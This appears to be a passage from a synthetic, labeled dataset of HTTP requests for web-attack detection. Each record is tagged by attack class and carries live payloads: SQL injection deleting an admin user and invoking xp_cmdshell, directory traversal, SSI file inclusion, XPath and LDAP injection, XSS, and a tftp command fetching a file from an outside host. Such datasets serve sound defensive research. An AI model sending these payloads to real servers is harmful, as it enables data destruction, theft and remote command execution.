Upgrade: bxnsG/8.0, e7cm/6.6
Warning: 589 www.3dab.jpg "husrsrrj" "Mon, 17 Jul 06 16:04:46 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: -------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41613
Start - Id: 35387
class: SqlInjection
GET /rrOexiad/82S/r21MegarVEpS4dNmM/iobiJ1Nj/adminBSwC/yrsu3Dnapa7sd/gUhv3TO4Q/pfdfAGZh1Mjf/4QrnlXRkwokGzj_Oe3/6rzdf0dbvr/oJ0SBNS5eYSTJCo.css?nH6xlelotjhp=AaD6%27++%29%3B+++DELETE+FROM+++++users++++WHERE++++upper%28username%29++%3D+++upper%28%27admin&naa=wi%3Aebi+nta HTTP/1.0
Host: 147.196.32.183
Connection: keep-alive
Accept: video/*
Accept-Charset: iso-8859-9, iso-8859-8-i, utf-7;q=0.4, iso-8859-4;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 136.187.28.79
Cookie: ati5steu=xtermmnir;ploEs=08516422;eo=71
Cookie2: $Version="11"
Date: Sun, 15 Jun 08 17:28:34 GMT
ETag: W/"1zpGD6YngN8ikJCz7Uio"
Expect: aean4o8=I7mo
From: 0boosr3e@ftEeuLd2wt.it
If-Modified-Since: Mon, 05 May 08 10:54:09 CET
If-Unmodified-Since: Tue, 19 May 09 06:51:15 UTC
If-Match: *
If-None-Match: *
If-Range: "y-asTxOuvRIWyr.wHS3v"
Max-Forwards: 4
MIME-Version: 9.2
Pragma: Qbd3hDeU=acrtaxe
Proxy-Authorization: NTLM ZWlEb1RhQXNodXNobmt0cmVlNnMxbnVoc0ljb2xsaWdjZW1z
Authorization: tfdyi wetoINl=Wpol
Range: 55-,0-,6611-
Referer: /alwtnt/oewopie/o0uoue/efhsale/aibalbrq.shtml
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.4 (compatible; Konqueror/3.2; Mac OS X; psnt1tlosa)
UA-CPU: Sparc
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 177x860
Via: 8.2 150.228.174.84, HTTP/1.3 www.stacaDle.tiff
Transfer-Encoding: identity
Warning: 933 134.218.228.163:17 "vrrEhe411r" 
X-Forwarded-For: 31.250.119.48
X-Serial-Number: 840148
----: -------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 35387
Start - Id: 43952
class: OsCommanding
GET /cgi-bin/../../../../../../../WINNT/system32/ping.exe 127.0.0.1? HTTP/1.0
Host: 83.87.124.98:74
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: x-mac-chinesetrad, iso-2022-jp;q=0.3
Accept-Encoding: 
Accept-Language: NtAt-slyisSet;q=0.1, big9z-irod9hiG;q=0.4, LhAxssMn-rsrtgy7;q=0.7, nLBevomc-elHe;q=0.7, icglr-qneta;q=0.3
Cache-Control: min-fresh=81760
Client-ip: 167.244.39.243
Cookie: XZ4cpWW7vqcI=/w6oyecM;/t>6 htacces ig ;jsozoenf=Rd;aabsi=Pst;nn8aia= &nph-D;tiutt6seen4q=5279013;kqreiseTxauNa=at1
Cookie2: $Version="790"
Date: Fri, 29 May 09 14:50:20 CET
ETag: "Nd4SKGTA_nnaZTH0"
Expect: Ktdna
From: axenii@lMdner.de
If-Modified-Since: Sun, 30 May 04 15:32:31 GMT
If-Unmodified-Since: Tue, 26 Sep 06 03:10:26 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 24 Jan 04 24:31:49 UTC
Max-Forwards: 9
MIME-Version: 7.7
Pragma: tdghaoVa='Rgnih'
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: Digest realm
Range: 97793-3,500796-0
Referer: http://www.tixmMnA7.net/eehS/foyctHf/iOraar/teti.mpg
TE: trailers
Trailer: Via
User-Agent: ibNuEG3 http://www.rinYikI.fr
UA-CPU: 68000
UA-Disp: 068,6822,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 539x520
Via: 4.4 178.53.171.229
Transfer-Encoding: caaa
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 327 www.3eSas.css "tdlqjc" "Sat, 26 Jan 08 18:17:22 CET"
X-Forwarded-For: 157.151.213.231
X-Serial-Number: 221610848523557
----: ------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43952
Start - Id: 39627
class: SSI
GET /LhsInk4ncre/UVx.positionpbCy@WBV1.php?INweawiiep=%3C%21--+++%23include++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+--%3E HTTP/1.0
Host: 85.224.70.199
Connection: zhxu
Accept: image/*, audio/basic;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: identity, identity, identity;q=0.3, compress
Accept-Language: onaaoe0h-tpj;q=0.8, hNa-oxjog6o, rasI1-eipods;q=0.5
Cache-Control: hte='uyuouiw'
Client-ip: 79.170.36.207
Cookie: 6A@Is5gYVvari0=dx@WsS6VeE;0a4lZzGk=gaDo;OlSNobjectd=17320431;avl=oa<7;toata=ens a]jiscripthHporewiafdocument
Cookie2: $Version="78"
Date: Sun, 09 Dec 07 14:47:25 CET
ETag: "JNM4muUx1V.zdKmp.HOl"
Expect: eninei
From: nneTpp@ds2o4khd.org
If-Modified-Since: Thu, 26 Aug 04 04:39:40 CET
If-Unmodified-Since: Wed, 06 Aug 08 05:59:41 UTC
If-Match: "_SLt8K4i53beQ2dK5"
If-None-Match: *
If-Range: "1tBDwK1AmirrXI9L"
Max-Forwards: 1
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest nc=2CEcd91a
Authorization: eaiie 8oiF=aChthh
Range: 973-,-4,32221-
Referer: /s6Vj2r/tcencon.tar.gz
TE: gzip;q=0.5
Trailer: Accept-Language
User-Agent: Mozilla/7.5 (X11; U; Linux i386 6.2; tf-am; rv:0.8.4) Gecko/08949213
UA-CPU: PowerPC
UA-Disp: 0993,069,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1841x260
Via: FTP/4.6 22.244.227.174
Transfer-Encoding: s5siuc; Amsanteh=2uiWS
Upgrade: Eyls/5.9, r7a/3.5, emaet9/3.7, Got/3.4
Warning: 475 125.51.35.41 "LSrhe" 
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 963759141034519657
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39627
Start - Id: 49933
class: XPathInjection
GET /smw3DF2-7rw.IVMZZ2P/EmetaeadlibO4KE/sriIxfmceaea.htm?dNileGtdoeph=tOwatD1d%27++or++count%28+++path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28++i%2B++j++%2B++k++%2Bl+++%2B++1%29%5D++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or++++%27hd%27+%3D++++%27++aXsi5ei%27+or&IevalYKunionf=eUstgddrE5rwnal&Rnnkcnn=0731&och2aolodr=optrma&N@nBuQ=069 HTTP/1.1
Host: 29.197.161.28
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8-i, iso-8859-1, koi8
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: 4tkjs='e3s1'
Client-ip: 69.149.110.120
Cookie: Zv3u=cVv6Cq_C9NJ2;ndseloehnNPs=Ltnjo7nr( 
Cookie2: $Version="5"
Date: Sat, 06 Mar 10 23:36:55 CET
ETag: W/"i-WIg.Pxydq@40bwD"
Expect: 100-continue
From: cbithw@teurCy.cz
If-Modified-Since: Tue, 20 Jan 09 05:31:29 GMT
If-Unmodified-Since: Sat, 03 Jan 09 17:25:51 GMT
If-Match: *
If-None-Match: "muZqlDxp0r9@lt5VLUp"
If-Range: *
Max-Forwards: 428
MIME-Version: 7.1
Pragma: e='esytSbsd'
Proxy-Authorization: Basic dGxpYTlzaTowbGVz
Authorization: aeNs hz4l=lmNso
Range: 53346-
Referer: http://cOiarnuS.biz/nin8/w3Dsa/ye2Ro7/tosd.conf
TE: trailers,trailers
Trailer: User-Agent
User-Agent: 0mYsl5eE/8.7
UA-CPU: x86
UA-Disp: 3308,0110,8
UA-OS: Solaris
UA-Pixels: 299x2707
Via: 0.5 www.uDretah4.css:36993, 1.1 www.45Taltn.jpeg:00787
Transfer-Encoding: gzip
Upgrade: aqoMa/0.9, fmonti/3.8
Warning: 456 243.193.239.132 "aIeI4en5" "Fri, 30 Mar 07 09:51:48 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 84157643689
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49933
Start - Id: 36963
class: LdapInjection
GET /eZUnlB365YbtrXA/bh1V39BCwWFJo2T/ma5iscaalrr85r/jnthk1TiOv/jnBn_6WJIzZQ7X25lSj/Z0@iHYOIMFoMg/dxc36A/rhfEaL-0lj/oR@836I66pf/yfa3appsioeSrenEahb/NEANThtacces_.E.jpg?xAMdVYD-fromSA=3%27a&smtTd=nPpBJh-z&abUea38t=vquO9MWY&siu4yiqhhr=aNuosIae6b7&pTFNohax9P=s5tyb5Lo&ypthbrrn=oSu&iz1hpnt=1191&sheaneaaheonnm=482&mayseitg5e=dn%29%28%7C++++%28apr%3D*%29&n99thidleeRenh=itastylealib%3Ch%2B%40tla&kags6twi=coxtermno1ophnetcath HTTP/1.0
Host: www.Tneiia.org
Connection: close
Accept: video/quicktime, audio/x-wav;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: min-fresh=38225
Client-ip: 248.80.57.117
Cookie: rsl9tn=eedlae4an;y4GB=ht|u
Cookie2: $Version="311"
Date: Sun, 03 Jan 10 22:34:27 CET
ETag: W/"0hNPjWgcQZJH5il"
Expect: erhfrxn=tA8teDd;dhrutcnn
From: ooeh@nqieoausen.gov
If-Unmodified-Since: Sat, 13 Dec 08 05:44:59 GMT
If-Match: *
If-None-Match: "b81RCllo4JeISay"
If-Range: *
Max-Forwards: 27
Pragma: no-cache
Proxy-Authorization: Digest opaque="cttu"
Authorization: Digest algorithm=MD5
Range: 84-,-422477,1197-5319
Referer: http://www.heNwcee.org/fo7tocn/9rekprE4/eaUt.pl
TE: deflate;q=0.0
Trailer: Max-Forwards
User-Agent: Mozilla/7.7 (compatible; poehai6e; SunOS sun4u; EmoaGoto7)
UA-CPU: Sparc
UA-Disp: 553,0581,32
UA-Pixels: 8538x2200
Transfer-Encoding: gzip
Upgrade: voikit/1.2
Warning: 812 30.165.31.159 "aiaexjhepibyi" 
X-Serial-Number: 36508239
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36963
Start - Id: 35068
class: SqlInjection
GET /stEendrO3anushqT/hU/tQpYmPHUejHGg@729JK/2tubvmDwLi/tRu57x5Kzme-Y/qbpNkissjxsbidr.cfm?793g=n%5CbW%3Fft%5D+r&E3dnpoe=526660&laiy=enasJ+rRa%2Fcm%3Aiadrops&anr=nR8ar&ZxtermVmpingH=Ti%5Cm&tndaCb7tO=p%26ee&Yyyah65=8760063129&tqlca71mlNse=caatthc&OtsSdtij4wa=aw&sgEveke2PDmaa5=%27%3BEXEC++master.dbo.xp_cmdshell+%27cmd.exe&49fhyeraa6edn=ynasaEfupen4 HTTP/1.1
Host: www.snciav.de
Connection: keep-alive
Accept: application/*, image/*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: compress;q=0.2, identity;q=0.8, compress;q=0.3, deflate, identity;q=0.9
Accept-Language: *;q=0.1
Cache-Control: max-stale=01
Date: Wed, 03 May 06 22:51:43 CET
ETag: W/"WyAF5zeDwrXpXGb"
Expect: 100-continue
If-Unmodified-Since: Sun, 11 Mar 07 02:35:49 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5689
Pragma: no-cache
Proxy-Authorization: NTLM aWQ5MGNBYXNhcmdFZW1zdGlpdDJpN0EyZGxybGxpbmlTZQ==
Authorization: Digest cnonce="rhbdsa"
Referer: http://www.mS6rodz7.net/oSc44eUk/fnosiOw.aspx
User-Agent: Mozilla/5.4 (X11; U; Open BSD i586 3.5; uL-no; rv:6.0.7) Gecko/77124204
UA-OS: WinNT
UA-Pixels: 4353x581
Via: 3.8 19.239.68.151
X-Serial-Number: 074180308
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35068
Start - Id: 46512
class: XSS
GET /<script>alert('Vulnerable')</script>.jsp? HTTP/1.1
Host: 135.238.134.88:80
Connection: rwssny
Accept: audio/basic, audio/*;q=0.0, audio/basic;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.1
Cache-Control: snqten6=t
Client-ip: 217.88.94.178
Cookie: rtciixv5oC=0380670585;atnb=nvajinhfoSxazs
Cookie2: $Version="1"
Date: Wed, 13 Jul 05 19:13:31 GMT
ETag: W/"CdcL9D22QKTslk5h3r"
Expect: 79eAowab=traDe;e6adti
From: csa3iee@teat.com
If-Modified-Since: Sun, 05 Oct 08 09:48:09 GMT
If-Unmodified-Since: Fri, 30 Apr 04 15:21:31 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 21 May 08 13:52:26 UTC
Max-Forwards: 8377
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: NTLM d29nc2tzd2ZJbnlsZGNmY2l1dHQ3Z3FzYWdvNG9tZXNmb3RzVG5sdHpxN3Nlcg==
Range: -97604
Referer: /cOepawln.nsf
TE: trailers,deflate,trailers
Trailer: Pragma
User-Agent: Mozilla/8.1 (Windows; U; Win98 9.6; sm-tu; rv:0.6.6) Gecko/82448676
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 139x000
Via: 5.3 2.153.93.218, 8.0 www.eiba.htm:62
Transfer-Encoding: gzip
Upgrade: eAeah/1.9, srlfi/6.1, 8t24e/5.5
Warning: 496 54.104.249.69 "iplf" "Fri, 06 May 05 07:10:25 GMT"
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46512
Start - Id: 43091
class: OsCommanding
GET /hmsezr/acceptY/yRwnph-0C5l1eL/uS/B33pservices/utnldrno/dw/iolIuqHnICR3Gp6DJ.-/jQ/eisyt9lau/5oxA8hhD0PwL4/twiua4hchoe.tiff?kBZr=nHV&cma=Tea&f7hxAr8nph-=rUOs%29&HMhSlSw6=2631190&nh4lno7rchb=4rte3+%2F%3Bfftf%3Csamlt&EjUzinclude7whereMOrmp7=422913&tloTt=0856017&hc3ooa=%27+++++%3Buftp+++++-g+%2Fhome%2Fmeis%2Fdeallegent++++175.76.188.72+%2Fde+++++%3B&dmtoeh1isqa=arqa8m_ku4&atmtqn=yonwal2kgo8an&gDsriia=9247444801&eoahsaDW0eonei=i+5pddj1reI1E&thtr4damaiyes=rntnMsbte&c4tlli=hgss3tusuEs8ewhede&ery0ucsbnn=isycsn1snhi00arch HTTP/1.1
Host: www.ner8.uk
Connection: close
Accept: audio/basic;q=0.9
Accept-Charset: iso-8859-2, x-mac-hebrew, x-mac-arabic, iso-8859-9, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: tz-asp, s8f-aph;q=0.0, keedoe-Ou, rAnad-qtrrrefo
Cache-Control: only-if-cached
Client-ip: 115.146.109.73
Cookie: lkssdsTro=jxNhuWCs;aattvau=7anT;acTe0t0LaF=-aorcaHlrhgd7ue;xRp1k6fJTKG=c@Ri.bO0a;cwntDdh=yu$o;igsaoeena38ceoe=hFbm8h-XrG
Cookie2: $Version="41"
Date: Tue, 08 Dec 09 14:07:23 CET
ETag: W/"as5zU3TltwGEc-Ix0hc"
If-Modified-Since: Mon, 13 Dec 04 23:13:57 UTC
If-Unmodified-Since: Tue, 18 Apr 06 19:01:19 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 07 Apr 05 23:46:07 UTC
Max-Forwards: 4422
Pragma: ient='i7'
Authorization: Basic ZWx3dG86cHVsc3U=
Referer: /jt5d8/itsetEi/ixrur/NOhglPs.js
TE: chunked;q=0.2,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/7.1 (X11; U; Solaris 1.4; io-nh; rv:5.4.6) Gecko/49964295
UA-OS: Mac OS X
Via: FTP/8.2 www.iog9irtq.png
Transfer-Encoding: identity
Upgrade: Fese/9.7, uSe/3.6, alh/3.9
X-Serial-Number: 306986025864028

null

End - Id: 43091
Start - Id: 41529
class: SqlInjection
PUT /gEvETsVQ/eormeErftsulsiirHn6o/eNBE58RLsjX/rmsr/ep13tnN/hseleohasso2/ryena95LEhuwowt/ooyVzdtCw/0V/wc4risiarhudtijyOe.msf? HTTP/1.0
Content-Length: 418
Content-Language: a7ifn,ar,iwow
Content-Encoding: gzip
Content-Location: http://www.eeeeada.st/isNieve7/ltnotonZ/9aooaee/ekels.mspx
Content-MD5: dGFlYW4yNGdpMXdtckpvaA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 20 Jul 07 10:33:24 GMT
Last-Modified: Wed, 21 May 08 04:18:21 GMT
Host: www.skaeA.be
Connection: keep-alive
Accept: text/plain;q=0.3, text/xml, audio/*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: eixa-n;q=0.6, eae-gcbUyI;q=0.4, tmpwH-cen, ahtdeh-ig;q=0.9
Cache-Control: max-age=39269
Client-ip: 194.192.129.109
Cookie: 9apassthrullpassthrufgPqKh= 9e)~;oi=eAmT90wm3LXC
Cookie2: $Version="988"
Date: Thu, 18 Oct 07 12:16:40 GMT
ETag: W/"yNW8OB@YMKq2YVr1"
Expect: maEbbf
From: tdvdi@oee6.st
If-Modified-Since: Fri, 07 Mar 08 09:52:12 UTC
If-Unmodified-Since: Fri, 23 Jun 06 11:15:32 UTC
If-Match: "DYUrs8Juq4sgn3LTn"
If-None-Match: "dQaukfEB62Jlttex9S"
If-Range: "ZuTCaNQcOg1yHTLv0b"
Max-Forwards: 94
MIME-Version: 0.0
Pragma: flsssyA='Mmayeipa'
Proxy-Authorization: NTLM dEU5ZGE5bXRvc1NwYVNlZXlueGFwM3RqdHRuZkJkYWRmYWI0
Authorization: NTLM dDdtT2psZHNoZU5vOXBldGZpbnRwYTdlaGpsaGZoN3RzbEI2ZHJvTDc=
Range: 911566-290,4666-98
Referer: http://www.lj4bEUa.ch/snunh/jlskrf/iUrb/homa.pl
TE: trailers,deflate;q=0.6,trailers
Trailer: Pragma
User-Agent: Mozilla/2.5 (compatible; hiozatteh1; Solaris; actisnrise)
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6912x601
Via: hxcmla/9.5 www.gisv.js, 9.8 207.0.249.91:998
Transfer-Encoding: compress
Upgrade: thce3c/8.9, 137aa/4.9, 5eyy/9.6
Warning: 403 68.147.161.49 "4oeh1aeq0hls" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

oUisk=chairs'    UN/**/ION SEL/**/ECT   ke FROM     dba_users    WHERE  gtd     like '%25&P43PmV-php=dw5&a8aaoM=Oot&x6KQ7I.n-Sry=897159&ftCmhrsjtterai=piseofhsyeh&erges=2366750&aycbatheEha=rupdateSgIkijhtu&wS0eqetna=930686860&eeohaeosonCmm=jSCt&C0TpB=2<s d2i1ishttp3ua7gposition&XGdjtopenqMxs=jvqtrEsk Pt-aakexecCxaccess_logE&8ed=yEeao)>apassthrutusrssCnvf&ct9=88541017&enthR8gB1eude=n b2leortAJ-lb

End - Id: 41529
Start - Id: 48388
class: XPathInjection
GET /i1dsrr/3ZE0V3MrSE3xI/eLx3PItPDZ4BSjCWYy/@fGFsamFV/abr0nIenZnZpA_I/ehKmCF9mg__KKyDvjxc/hW5O/ppae/rKc8mlocationaZcmddjxm@V/7Z11fh.mdb?hetgs=2nph-mTnmeR&r6iqeie=ayhx&3aoyesdslrh=860239&ghtaEhdp=inOc&tegjf=a1tHB7Yh5&5ucEonc5OA=32435&yxp=c&aeyicxEabi2f=zyy&CBEOPZz6wnc=rPrtdn&Extitaoemf=fabaghxcgzstegean&tbsoi=led&jrtl6adiaifl=+Ek+2shepln2no&eZ4y3trosl=0rkngt HTTP/1.0
Host: 0.174.38.219
Connection: keep-alive
Accept: audio/x-wav;q=0.5
Accept-Charset: euc-cn
Accept-Encoding: identity;q=0.1, identity;q=0.6, gzip, gzip
Accept-Language: mf-mOounet;q=0.5, a-r, q91ve-o0ed, oehnyvi-J;q=0.9
Cache-Control: only-if-cached
Client-ip: 235.247.66.246
Cookie: rcigaovbece=t];araQaisqyybtyck=ra;ew=81184 or     ih/ae0na/erfoay/child::node()[position()=6]  or     1054=;KqoLecho1yASOPR=xiB
Cookie2: $Version="5"
Date: Sat, 11 Aug 07 08:56:40 GMT
ETag: W/"T0Asmzf2MAz8git"
Expect: qu0u=ca8tor
From: hxesydot@eh4weelft.gov
If-Modified-Since: Wed, 06 Aug 08 08:13:26 UTC
If-Unmodified-Since: Sat, 17 Jun 06 17:54:22 GMT
If-Match: *
If-None-Match: "wbRE2czu_OutNrMwOWI"
If-Range: *
Max-Forwards: 8012
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM b3N0ckNxM3Vpd3RzZDNic3QxM3JtbnRlT2ZleXRob0RpMDhUbGVoaDNtaWFoeA==
Authorization: Basic d2VzdDpyZ2V0
Referer: http://relas.org/sdoj/ot6nDaa/utle/touhge/uafE.rar
TE: gzip;q=0.8,chunked;q=0.6
Trailer: Range
User-Agent: Mozilla/0.3 (X11; U; Linux i586 6.0; ha-ee; rv:0.7.6) Gecko/40420661
UA-CPU: 68000
UA-Disp: 998,4488,32
UA-Color: color8
UA-Pixels: 128x9065
Via: 3.1 www.no2n7Hjm.shtml, FTP/2.0 80.91.89.95:907
Transfer-Encoding: deflate
Upgrade: 6axT/7.7
Warning: 806 213.116.237.52:6 "xenjCo4d" "Wed, 13 Oct 04 20:32:15 CET"
X-Serial-Number: 631643747373
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48388
Start - Id: 49770
class: XPathInjection
GET /mu8dcjWBsHr/bMHMojimgperlu3rcpvP/5b/rs-M6Gnj8gpvIhyBDt/r3Nzrx5GZV/h5wpo/ren6xnirrmndu/I.ykY5pxgxterme.php?iserm=eoes%27++++or++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++++or+%27ibn%27+++%3D++++%27&Vhn2l=iyod&n5n4twrph=nsrd&nQd0eB6lZshDca=amiDMua8YfB&CscriptB7=43&sab7tieuIM9oada=0693655&9CsamVaNPyJd=0Sowsjsh&8f8=i&vixnneRg1=A2hxyoofMb&orEelne=71&te=iu&sqxaoukw=huvtrrn&nea813oss92dnT=tDHmFG HTTP/1.1
Host: www.aern.it
Connection: iMdtnieo
Accept: */*
Accept-Charset: iso-8859-15, x-mac-roman;q=0.0, iso-2022-kr;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=7
Client-ip: 253.1.218.202
Cookie: 5btuXhzle=eyigroup by[y0;riclensteTEqut=hsrwta2qxirmo|naa;oiDh=rHWsF-hI9VR;h1xmtajawutRh8=91913;ey=binkdkd0daaccess_log8nfeo3;lyxiesiayeg=3zUzRWv
Cookie2: $Version="2"
Date: Tue, 19 Jun 07 05:05:32 CET
ETag: W/"KnKCfoDimSyNjwBe9@oK"
Expect: 100-continue
From: pohawiI@9f0Ofa.ch
If-Modified-Since: Thu, 19 Mar 09 04:49:38 CET
If-Unmodified-Since: Sat, 05 May 07 11:03:11 CET
If-Match: "p5-@7mBKpjv5oW8V-"
If-None-Match: *
If-Range: *
Max-Forwards: 406
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM ZXNScWFmc2VueXpMc3Vlb255ZXNudWVhc2JlZXU1clRzaUhlY2lk
Range: 038-33,-803
Referer: /p7ifss/Owcroat/u2aopa.php
TE: trailers,deflate,trailers
Trailer: Connection
User-Agent: Mozilla/5.3 (X11; U; Linux i586 1.6; ga-vu; rv:2.7.5) Gecko/23717477
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3095x7377
Via: 4.7 www.9ape.gif
Transfer-Encoding: gzip
Upgrade: sEr/5.8, wolisa/6.8
Warning: 313 www.rnatjdd.tiff "ikOaheaoton2wee" "Wed, 13 May 09 04:48:39 UTC"
X-Forwarded-For: 242.32.16.78
X-Serial-Number: 9273829516846529
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49770
Start - Id: 48777
class: XPathInjection
GET /eOwpO2-ZpPKEn/v3CBua0Pp0K8iI5_Cxy/tKA/Bh/sMprbfhr/.wBa-homevULcX6T.U/eeaeuaiicoetjt/od-MWv18SUw/a5.pl?hstiiOev8CiPn=4652&tt=sredvbe9ensheyaf4&naaett=+s%28s&-T5GxiZHvu=eQm5oEnqzgcF&cehSNskoi=currfo%27++or++1%3C+++++seym%2Ft9I%2FtGoIe%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D586%5D+++or++++%27qow%27++%3D+%27&hi4jmytiii=6NqAU HTTP/1.1
Host: 225.15.105.144:99
Connection: trhee
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: compress;q=0.9, deflate;q=0.6
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 52.82.251.39
Cookie: rHhoIl=ih8c) ;Ld=Am4 'scriptcv
Cookie2: $Version="1"
Date: Sat, 27 May 06 03:16:31 CET
ETag: "XaSF7ffVYiharLa0lA"
Expect: 1iorty=eRge6q1n;izgc=atllh1ah
From: eaa6xs@nsEi2dUOb.uk
If-Modified-Since: Fri, 20 Apr 07 05:50:12 GMT
If-Unmodified-Since: Thu, 06 Jan 05 23:22:59 GMT
If-Match: *
If-None-Match: "kAy0arUAypvLS.f@_V"
If-Range: Wed, 21 Feb 07 22:57:55 UTC
Max-Forwards: 4378
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: NTLM dnRyaGhlbHJpbHRndG1uYWh3aWVjZWVtdFNodHJlRHJ0dHNlbnJybnVhYW5oSHQ=
Authorization: etllH 3Ru8ttge=taSgioeb
Range: -333764,-7
Referer: /htnaa3r/asaTsccn/coox/enanr.php3
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: 1kiCXD1D http://www.eCyotl.de
UA-CPU: MIPS
UA-Disp: 019,118,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0640x829
Via: HTTP/3.5 www.tt0t.htm:070, 2.7 www.yecwo.htm
Transfer-Encoding: eokhc; dyEst=b0uq4
Upgrade: dMji/4.6, m1ce/2.1, ittqim/8.3, stojw/5.9, fftt/6.2
Warning: 626 www.ecaver.tiff "tekucdTs" "Thu, 03 Dec 09 04:34:47 UTC"
X-Forwarded-For: 35.28.166.160
X-Serial-Number: 265535777881770929
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48777
Start - Id: 39340
class: SSI
GET /roisptr42kec4/i1PPsA7d_.56z.php3?PnullP0Anb=lswCOn1&DsbOht=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.0
Host: www.tsrhnrlco.uk:0724
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8-i, x-mac-korean;q=0.1, x-mac-roman, gb2312;q=0.1
Accept-Encoding: identity, deflate, gzip;q=0.0, compress, identity;q=0.3
Accept-Language: *
Cache-Control: dnhhtas='e4'
Client-ip: 153.213.53.71
Cookie: LMJ0BN6htpassmV=h"@"n;uotthoe=gensnooSnxtermteE;r6miife=kpd;theaTizCkeyuL=a\metxtr2v;eUjennhm=6;pneentdi7lc=rm\u
Cookie2: $Version="907"
Date: Fri, 11 Sep 09 07:16:19 UTC
ETag: W/"UfE2ce@UXAHx12IVp"
Expect: utbrf
From: tuHdgsLz@bmsemyoDde.biz
If-Modified-Since: Thu, 03 Apr 08 13:16:42 GMT
If-Unmodified-Since: Tue, 01 Jul 08 02:42:00 UTC
If-Match: *
If-None-Match: "3mpmfDyxbeeWbZR"
If-Range: Mon, 09 May 05 14:44:23 UTC
Max-Forwards: 9987
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM dDF5cXlCY2FlcnMwZ3RveXJlbHQ4b0Vhc1R5cmhvaGFvaGU4c2Q=
Authorization: NTLM b3RlZWw1dEVlZWVydVJyWWduQ2JhbjJ0Y3JubHJuZXNuZTIx
Range: 422767-,0924-,61697-47592
Referer: http://anrgxh.de/Taxsstei/a3tt/rpcm/qdedeae.js
TE: chunked;q=0.7
Trailer: Connection
User-Agent: oetm (sHTpXXBzTz)
UA-CPU: Sparc
UA-Disp: 879,3811,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 3324x441
Via: 1.9 116.134.112.243, 8.5 114.203.73.248:11, 9.2 www.ortnei.jpg
Transfer-Encoding: compress
Upgrade: 5lnxa/4.9, sonsya/6.3
Warning: 330 59.99.71.16 "lsngqsttrt0oajgUtrih" "Mon, 05 Mar 07 23:21:49 CET"
X-Forwarded-For: 135.206.207.129
X-Serial-Number: 802337450581
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39340
Start - Id: 38745
class: LdapInjection
